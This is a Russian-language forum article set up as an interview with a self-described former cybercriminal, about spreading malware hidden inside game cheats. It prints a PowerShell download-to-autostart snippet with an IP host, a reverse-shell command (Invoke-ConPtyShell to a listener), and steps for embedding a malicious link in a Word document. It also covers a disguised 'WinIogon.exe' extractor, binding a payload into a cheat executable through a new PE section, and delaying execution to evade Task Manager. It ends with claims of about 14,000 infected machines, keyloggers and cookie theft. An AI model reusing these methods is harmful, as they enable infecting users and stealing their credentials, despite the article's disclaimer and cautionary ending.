Как прост и как прекрасен мир
все в нем чудесно, хоть и платно
а для жмотов еще есть сыр
он в мышеловке, как не странно
@useless
Эхо Террора: исповедь бывшего киберпреступника - читы, лудомания и первое текстовое интервью
(делал @вася трубочист )
(делал @вася трубочист )
Привет, как Вы уже могли понять, эта статья будет другой, так как начинается немного иначе, но разница не только в первых словах, а и в концепте. Сегодня это будет более похоже на техническое интервью, где некий человек поделится способами, как он организовал миллионную малварьную сеть на базе обычного человеческого эгоизма и желания почувствовать превосходство над другими. А продолжим в моем излюбленном стиле.
Алчность, желание силы и безграничное эго. Что из всего этого тебе знакомо? Наверное, ничего , если ты никогда не играл в соревновательные онлайн игры, в которых игрок противопоставляется игроку, то есть PvP. И заметил я странную тенденцию, все хотят доминировать, а зацикленность на этом зачастую приводит к этому:
А это, в закономерном итоге, приводит к такому::
Естественно, потратив несколько сотен часов из собственной жизни можно добиться неплохих результатов, а большинство людей так и поступают, но разве незрелому уму эта истина постижима? Сомневаюсь.
Ведь отчаявшись, некоторые индивиды прибегают к очень радикальным мерам, ставя свою безопасность под неведомо большую угрозу. Хотя большинству этих лудоманов, да, а именно так для себя я их классифицирую, вовсе неизвестно слово "страх". И сегодня мне посчастливилось позаимствовать историю распространения ПО, но со вшитыми вредоносами для таких вот болванов у одного нашего автора, предложившего мне коллаборацию. Тянуть не буду, господин Трубочист, прошу в студию.
T: Привет-привет, если ты следил за блогом Сodeby, то явно уже видел несколько моих статей. Меня зовут Трубочист, а на что ты рассчитывал? Что я назову своё реальное имя, фамилию и прочую информацию? И несколько лет тому назад я активно занимался распространением собственного читерского ПО для таких игр как CS GO, PUBG и так далее, но в основном все программы содержали вредоносный код. Я не горжусь этим, но когда я учился в колледже, мне позарез нужны были средства для существования. Автор, а дисклеймер нужен?
D: Да, твой или мой?
T: Давай твой, мой до боли прозаичен.
D: Скажи что-то крутое. Он просто так не появляется в моих статьях.
T: ТрахТибидох!
Дисклеймер
На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.
О личности нашего гостя: что, как и почему он стал на кривую дорожку
D: Итак, дорогой мой гость, начнем с простого. Расскажи, что тебя вообще сподвигло начать заниматься подобным?
T: Знаешь, тогда я был на третьем курсе колледжа, учился на “программиста”, если так можно выразиться. В 2019 году я съехал от родителей в другой город и начал пытаться строить жизнь с нуля. Как типичный представитель эдакого современного движения “работать не хочется, а жить ни в чем не отказывая охота”, я искал альтернативные методы заработка, фрилансил. Но не сказал бы, что этого хватало на безбедную жизнь. И в один вечер меня постигла мысля как заработать достаточную сумму. Дело здесь больше в психологии детей, нежели в моей гениальности.
D: Я уже примерно смекнул о чем ты. То есть заглавия, типа “в читах часто есть и вредоносное ПО”, никого не останавливают, а даже наоборот добавляют азарта, заставляя таки выключить антивирус, если он имеется, конечно.
T: Да. Именно так. В принципе существует очень много сайтов/форумов, на которых ведется распространение вредоносного ПО, где авторы прямо говорят, мол, отключите антивирус и все будет окей. Заметив, что на популярных русскоязычных сайтах число скачиваний условного чита составляет около 200-300 тысяч, а проведя самый простенький анализ уже можно было сказать, что помимо средства для нечестной игры там ещё и бэкдор, я решил попробовать сделать так же.
Окей, а сейчас немного отвлечемся от опроса нашего гостя и давайте проведем простенький тест. Возьмем первый попавшийся сайт из поисковика, скачаем, якобы чит и проведем простейший статистический и динамический анализ, пытаясь определить есть там действительно какой-то зловред или же подобное встречается намного реже, чем нам кажется.
Для первого типа анализа воспользуемся старым добрым DIE, то есть не умри, а Detect it easy. В принципе, арсенал программы достаточно богат, но я не думаю, что нам потребуется что-либо кроме нескольких дефолтных функций. Поехали. Оп-оп, забыл, кстати вирустотал не показал ничего.
Открываем нашу утилиту, быстренько определяем путь к нужному файлу и просмотрим базовую информацию о скачанной программе. Путем дизассемблирования можно лишь понять, что писал это криворукий восьмилетний мальчик на VS 2008, что особо не дает никакой информации. Больше всего меня интересует энтропия, то есть заголовки в PE файле, просто, если судить по рассказу нашего гостя, то это самый частый способ внедрения вредоносов такой тип файлов.
И даже думать здесь особо не нужно, ведь заголовок с названием “МaTb” может означать две вещи: или кодер очень любит свою маму, или он просто таким образом решил добавить в это заглавие вредоносный код, питая надежды на то, что никогда и никто не будет просматривать эту информацию.
Дабы получить более детальную информацию, нам понадобится распаковать эту штуку, а она запакована банальным UPX-ом, делается это следующим образом:
Код:
upx -d cheat.exeТеперь открываем в ОллиДБГ и ищем то самое заглавие, именуемое как “мать”, а картина здесь не очень радужная, ведь заглавие полно нулевых байтов, как при грубом создании нового заголовка через какой-то простенький PE Editor .
Но нас больше интересует, что же на самом деле в этом заглавии, потому что нулевые байты, которые не были удалены, могут обозначать, что и никакой инжект не проводился, поэтому воспользуемся поиском. Нас интересуют инструкции в следующем порядке, если судить по всем гайдам по этой теме в интернете, я сомневаюсь, что парнишка придумал что-то своё:
Код:
PUSHAD
PUSHFD
B0717D28041785935E756ED47A996EC9
POPAD
POPFDУспех, эти инструкции есть и между ними какая-то штука в хеше. Очевидно? Наверное, да. Но если копнуть глубже и порассуждать, то мы получаем очень занятную картину. Ведь основная аудитория порталов с читами не имеет даже полного среднего образования, а стало быть проверять в такой поверхностной глубине, ну для нас это так, не станет. Простая, актуальная и очень действенная психология. Если антивирусы никак не реагируют на этот файл, то и вредоноса нет.
Итак, интересует больше всего меня что же такого сюда спрятал наш злоумышленник с ником Админ:
Код:
B0717D28041785935E756ED47A996EC9Для этого просто пойдем на любой дешифратор и попытаемся докопаться до истины сие дела.
А здесь имелся простенький такой кодец на Павершелл, который производил загрузку чего-то неизвестного в директорию автозагрузки:
Код:
wget "https://134.124.13.1/fremfjerfmek34jr34/zip.exe" -outfile "matb"
}catch{
break
}
Expand-Archive -LiteralPath "$archiveName" -DestinationPath "$extPath" -Force
Remove-Item path "matb" -Force
}К сожалению, узнать что именно там находилось не представляется возможным так как эта ссылка вовсе не есть рабочей.
Мини итоги
Как видите, первый попавшийся чит оказался с какой-то непонятной штукой, которая явно могла поставить под угрозу ваше устройство. Представьте, если там был бы какой-то аналог монооксида.
Возвращаемся к месье Трубочисту.
T: Да-да, я уже заждался. Сижу смотрю, как ты пишешь.
D: Ну ладненько. Расскажи тогда о своем первом опыте и попытке распространить свой вредонос в массы.
T: На деле, это очень длинная история. Наверное, после того как я заприметил для себя эту идею, я около двух месяцев искал портал, на котором можно было бы реализовать подобное. А потом ещё неделю или две втирался в доверие к главному администратору портала, мол смотри, я могу делать твою работу бесплатно и ты сэкономишь своё время. Ну и таким образом это началось.
Я просто качал программы с других порталов, добавлял свое описание и перезаливал. Естественно, отнюдь не сразу я начал реализовывать свой план. Для начала, на то время я был полнейшим профаном в плане вот этой вот вирусной темы. Я даже не понимал банальной механики: как сделать так, чтобы не спалиться самому и пользователь таки установил то, что нужно.
Но желание пересилило страх и было принято решение попытаться что-то сделать.
D: Так-так-так. И что же это было? Неужели простой пейлоад с Метасплоита?
T: Чуть со смеху не проломил стол лбом. Нет, хотя пусть это и было поднято нами на смех, думаю, что если бы я так сделал, то процентов 70 повелось бы, но это не соответствовало моим дальнейшим планам.
D: Ну да, сделай ты так, нашлись бы умники, твердящие, что ничего не работает и здесь какой-то вирус. А это уже в свою очередь вызвало бы подозрения у создателя и труды двух с половиной месяцев пошли бы прахом.
T: Именно, друг мой. Поэтому я начал снимать видео на ютуб.
D: Чё? Ты там головой ударился?
T: Нет-нет, действительно, я стал снимать обзоры софта и прекратил писать подробное описание в постах. И все для того, чтобы ссылку на них вставить в, приложенный к программе, вордовский документ , а туда уже вирус. Хотя это и выглядело очень кринжово. То есть ссылка на ютуб, которая почему-то скачивает тебе на устройство файл с расширением Video.mp4.exe. Хотя опять же, стоит заметить, что Windows по дефолту прячет расширение файла, поэтому не так и плохо.
D: А-а-а.. Я помню что-то такое в году 2017 было действительно популярно.
T: Самой полезной нагрузкой выступал простенький павершелл, очень повезло, что тогда я додумался спрятать в папках с архивом видео, для открытия которого указать путь в .exeшнике. Это ужасно плохо, но для первого опыта сгодится, передаю эстафету тебе.
Ладушки-оладушки. Что же, покажу примерно как это работает, ребятки. Мое лично мнение по этому поводу довольно субъективно, такая схема была обречена на провал. Какой нужно было иметь IQ, дабы действительно открыть скачанный файл и не заметить подвоха. Наверное, морская звезда и то будет умнее такого человека. Да, Патрик?
Видите, он согласен.
Итак, рассказываю кратенько, сперва создаем документ WORD, как это делать знает даже эта очаровашка с открытым ртом, да?
Какой умница, видите, он умеет. А вы?
Вставляем рандомное видео, сохраняем и закрываем, теперь нам нужно добавить этот документ в архив, желательно 7zip, но пойдёт любой. Теперь кликаем на документ - показать содержимое и достаем оттуда файлик с названием document.xml.
Открываем его любым текстовым редактором, а после ищем строчку с нашей ссылкой, заменяем её на любое, что будет угодно, сохраняем и закидываем отредактированный файлик обратно в архив. На этом все.
Сам вредоносный код выглядеть будет вот таким образом и никак не детектится антивирусами, так как является банальными командами для оболочки Powershell, хотя эти превратить это уже в Base64, то могут возникнуть проблемы:
Код:
IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell 192.168.1.1 1337С компилированием в exe, проблем возникнуть не должно, я это уже показывал во вставке в статье @useless:
Код:
Install-Module ps2exe
Invoke-ps2exe .\uzbek.ps1 .\kazach.exeГосподин Трубочист, я к вам опять. Теперь о результативности поведай-ка мне.
T: У нас неплохо выходит вроде как. Знаешь, я сам был порядком удивлен происходящему, так как на это попалось около 50 человек. Тогда я ничего не стал делать, это было что-то типа разведки. Нужно было определить степень доверия этой аудитории. Уровень оказался, на удивление, огромным.
D: Ладненько, что же стало вторым шагом, дорогой мой друг.
T: А здесь я уже порядком запарился. Я изучил порядки определения маскированных процессов и подошел к делу со всей серьезностью, написав подобие полезной нагрузки на Python, а после уже импортировал это все в чит программу, которую купил за рублей 100. Но она была приватная и не имела защиты, идеальный вариант. Что было примерно по коду, поясню здесь и сейчас, дабы не напрягать тебя, ведь это не твоя сильная сторона.
D: Пф-ф-ф. Не соперничать мне с дипломированным разработчиком. Начинай.
Инициатива у меня, ура. Думаю, что не стоит здесь расписывать подробно, как же я его писал, а просто вставлю некоторые пояснения о коде и то, как он выглядит. Надеюсь, что всем известно, что сам собой Пэйлоад представляет в цепочке эксплуатации важную, но отнюдь не главную роль. Он выступает неким посредником между сервером, генерирующим сам вредоносный код, открывающий сессию и атакуемым устройством.
Проще говоря, полезная нагрузка доставляет как раз-таки вредоносный код и не является им, поэтому сам вид пэйлоада будет довольно простым, естественно он не подлежит детекту, так как в нем нет ничего зазорного для антивируса:
Мы подключаем стандартный модуль сокет и пытаемся подключится к нашему слушателю по указанным данным, после чего ожидаем выполнение кода от сервера. Иначе здесь никак.
Далее переходим к тому, как выглядит сервер, подробности здесь упущу, но расскажу о самой важной части кода здесь - это непосредственно вредоносный код:
Ничего особого здесь нет, но реализовано даже переподключение к серверу, на случай если он будет перезапущен, я оставлю все исходники во вложениях, если DeathDay позволит, можешь сам посмотреть и понять что к чему.
Но на этом я не остановился, так как я хотел организовать все максимально красиво и чтобы оно никак не палилось и даже если бы кто-то захотел обнаружить, что у него на устройстве имеется какое-то дерьмо, у него это скудно получалось.
Поэтому тогда меня посетила идея написать экстрактор на Питоне, сжать пейлоад в непонятном для рядового пользователя расширении, задать ему имя системного процесса и распаковать в папку, где хранится оригинальный, допустим SVchost.exe. О маскировке процессов расскажет мой коллега. Как тебя вызвать? Алло, я знаю, что ты здесь. Санек, отдай сотку.
D: Я не должен тебе.
T: О, появился. Расскажи о маскараде.
D: …
Итак, поведаю я вам как можно обнаружить процесс, который пытается быть похожим на системный. А там уже подключите реверсивную логику и это уже будет алгоритм как сделать вредоносный процесс визуально подходящим на роль дефолтного.
Имейте в виду, что процессы Windows имеют ожидаемые характеристики, такие как известные пути к файлам, учетные записи пользователей и родительские процессы.
Когда перед вами задача обнаружить вредонос в процессах, вы ожидаете, что авторы вредоносных программ будут называть свои полезные нагрузки так же, как процессы Windows.
А чтобы обеспечить обнаружение, нам потребуется создать некоторую логику, которая будет срабатывать всякий раз, когда какой-либо из этих процессов не подходит под нужные параметры.
Хотя большинство диванных аналитиков включают режим “Муд Патрик”, зайдя в диспетчер задач(не рекомендую им пользоваться) и на этом все заканчивается:
Вы вот знаете, что такое процесс SvсHost? Патрик опять знает, ну как не стыдно. По факту, он должен иметь следующие свойства:
- Путь к файлу: C:\Windows\System32\svchost.exe или C:\Windows\SysWOW64\svchost.exe
- Имя процесса: svchost.exe
- Командная строка: включает:-k
- Внутреннее имя :svchost.exe
- Путь к файлу не соответствует заданным дефолтным значениям.
- Внутреннее имя процесса имеет другое значение и так далее.
Это банально, но оно работает.
Как можно догадаться, злоумышленники любят использовать в своих интересах тот факт, что аналитики не всегда могут иметь надлежащие инструменты, данные или контекст для тщательного изучения угроз.
Например, обычной практикой в криминалистике является сбор списка запущенных процессов для просмотра аналитиком, опыт в этом у меня определенный есть.
Учитывая список процессов (или несколько списков, в зависимости от объема расследования), может быть неочевидно, что запущен вредоносный экземпляр svchost, если вы также не извлекаете данные, такие как пути к процессам.
Будь я преступником, я бы не стал называть свою полезную нагрузку так же, как процесс svchost, потому что ее обнаружение, как правило, является простым делом, учитывая описанную выше логику обнаружения. Другой распространенный метод - слегка изменить законный процесс и таким образом выполнить полезную нагрузку. Здесь совсем все запутано, ведь некий вредонос, по типу вымогателей из семейства Direx, может иметь функцию изменения оригинального имени Svhost’a под какой-то, типа Svvasauzbecushost.exe, а сам же оставаться на месте легитимного.
Также есть вариант, когда зловред создает папку в каталоге с .exeшником, под которого маскируется и размещается в ней, якобы действительно, пути одинаковы, но это совсем не так.
Но опять же, если просто взять и начать просматривать эти вредоносы в DIE, то сразу станет ясно, что к чему.
T: Да, но я пошел самым первым путем, но сделал это с изюминкой. Для действий был выбран процесс Winlogon. Кто знает почему? Патрик?
D: Он понимает, но молчит. Я отвечу, как бывший игрок сампа - для меня это очень примитивно. Так как на этом был основан метод подмены ников, допустим, видишь ли ты разницу, друг мой, между I и l? Если это дефолтный шрифт, то вряд-ли.
T: Да, ты прав. Поэтому Winlogon.exe и WinIogon.exe могут существовать в одном каталоге с идентичным именем.
Поэтому я занялся написанием простенького скрипта, который бы проводил разархивацию по заданному пути, сам запуск полезной нагрузки производился только после рестарта устройства. Так как я учел, что существуют люди, которые сразу бегут проверять диспетчер задач, хотя ещё была идея сделать так, чтобы при открытии диспетчера вредонос сразу же закрывался. :
Код:
Windows/system32 и %APPDATA%\Microsoft\Windows\Start Menu\Programs\StartupСам код архиватора до боли простенький:
Код:
# pip install pyzipper
import pyzipper
def decrypt(file_path, word):
with pyzipper.AESZipFile(file_path, 'r', compression=pyzipper.ZIP_LZMA, encryption=pyzipper.WZ_AES) \
as extracted_zip:
try:
extracted_zip.extractall(pwd=word)
except RuntimeError as ex:
print(ex)
decrypt('WinIogon.exe.zip', b'SFERGLEERefreLEREL')Да, Десдейка, это намного проще, чем на твоих этих С++, учи Питон.
Далее эту штуку нужно превратить в исполняемый файл, делается это с помощью репозитория py_to_exe, установим-ка его:
Код:
pip install auto-py-to-exeОткрывается вот это кошерное окошечко, где мы выбираем необходимое приложение с расширением .py, затем в опциях выберем консольное приложение и на этом все. Компилируем. Результат будет в созданной папочке, теперь его можно выполнять на любых устройствах без предварительной установки Python.
D: Так-с, а что дальше?
T: Теперь самая сложная часть, сделать из нашего архиватора и чита единое целое. Здесь уже твоя территория, когда-то я с этим очень долго мучался.
Как скажешь, товарищ Трубочист. Что же, сперва давайте проверим защищенность нашего .exe для склейки. Установим необходимый скрипт:
Код:
Import-Module /deskop/Get-PESecurity.psm1
Set-ExecutionPolicy unrestrictedА далее и проверочка:
Код:
Get-PESecurity -f 1.exe
Следующим шагом будет создание нового заголовка раздела, делается это достаточно просто. Понадобится нам лишь утилита LordPE, которую можно скачать в открытом доступе, да и её эксплуатация не особо тяжела.
Откроем нашего Лорда, кликаем на “PE editor” - выбираем 7zip - “sections” - кликаем правой кнопкой мыши - “new header” - называем то и даём ему значения в 1000 байт в исходном и виртуальном размере. Сохраняем и выходим. Далее в HEX эдиторе добавляем в конец тысячу байт и выходим.
Следуем в Olly, переходим в “Memory Map”, после смотрим графу “Contains” и ищем “PE header”. То есть строчку, где лежат вот эти заглавия, дважды кликаем по нему и в конце видим следующее:
О, смотрите… Что же это? Это птица. Нет, это самолет. Та куда там, это дирижабль. Нет, ребятки, это обман. Вы уж простите, но описывать до конца эту процедуру я не стану и так статья большой выходит очень, лучше оставить часть для итогов.
Эпилог: выводы и судьба-злодейка
D: Итак, дорогой мой гость, ответь ещё на пару вопросиков. Каков был успех вот этой схемы, о которой мы поведали?
T: Знаешь, я не ожидал, что сработает насколько хорошо. Около двух тысяч полученных оболочек за сутки. Итоговое число было что-то рядышком с 14.000 .
D: Ты на этом остановился? И что ты делал дальше с этими оболочками?
T: Нет, я продолжил делать то же самое и дальше, но уже с другими программами. Зачастую ничего, но когда характеристики ПК жертвы были сильно уж “жирными”, ну типа две видеокарты 2080TI, то я подгружал или кейлогеры, взятые с GitHub или скрипты для воровства куков.
D: Мг-г, а что же тебя остановило?
T: Знаешь, все, кто нарушает закон, имеют одно опасение - быть пойманными. Многие верят в свою неуязвимость, но не я. В конце концов дошло до того, что мне было страшно открывать двери , когда в них кто-то звонил, также и с мобильными . Но вот мой страх воплотился в реальность и меня… Как бы так сказать не грубо, набутылили в общем. Я отделался условным сроком, но это несводимое пятно с моего жизненного листа.
Что же. На этой поучительной ноте и закончим. Не забывайте, что мы не находимся в каком-то аниме или книге. Это - самая что ни на есть реальность. И рано или поздно, всех злодеев постигнет печальная участь. А с вами был, уже как всегда, какой-то непонятный парнишка с ником DeathDay (а также его редактор Яш) и его величество @вася трубочист . Мира всем, свидимся.
Патрик, попрощайся с читателями, емае.
Последнее редактирование модератором:
